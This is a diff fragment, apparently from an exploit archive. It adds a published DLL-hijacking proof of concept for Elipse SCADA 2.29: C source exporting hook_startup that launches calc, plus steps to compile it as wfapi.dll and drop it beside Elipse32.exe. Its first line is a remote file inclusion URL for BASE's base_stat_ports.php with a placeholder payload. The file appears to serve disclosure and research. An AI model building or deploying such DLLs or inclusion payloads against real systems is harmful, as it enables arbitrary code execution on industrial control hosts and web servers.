+Exploit: http://www.example.com/base/base_stat_ports.php?BASE_path=[EV!L]

platforms/windows/local/36700.txt

@@ -0,0 +1,22 @@
+#[+] Author: PETER CHENG
+
+#[+] Exploit Title: Elipse SCADA DLL Hijacking
+#[+] Date: 09-04-2015
+#[+] Type: Local Exploits
+#[+] Tested on: WinXp/Windows 7 Pro
+#[+] Vendor Homepage: http://www.elipse.com.br/
+#[+] Software Link: http://www.elipse.com.br/eng/download_scada.aspx
+#[+] Version: Elipse32.exe version - 2.29 b141]
+#[+] Create and Compile the file then rename it to wfapi.dll and put it to the dir which the same with file Elipse32.exe, double-click #to run Elipse32.exe to launch the app.
+
+
+#include <windows.h>
+#define DllExport __declspec (dllexport)
+DllExport void hook_startup() { exp(); }
+  
+int exp()
+{
+  WinExec("calc", 0);
+  exit(0);
+  return 0;
+}